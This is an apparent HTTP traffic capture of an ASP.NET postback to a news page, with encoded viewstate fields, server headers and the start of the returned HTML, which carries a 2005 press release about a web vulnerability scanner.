          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4%2B8K4F%2F0js11lBw12IN%2FOFdqHcc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKpz%2FfHDgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ90tjPbD69UwpHdROB4Qqxfz1aHXA%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 30429
          
          
          Response body (30429 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG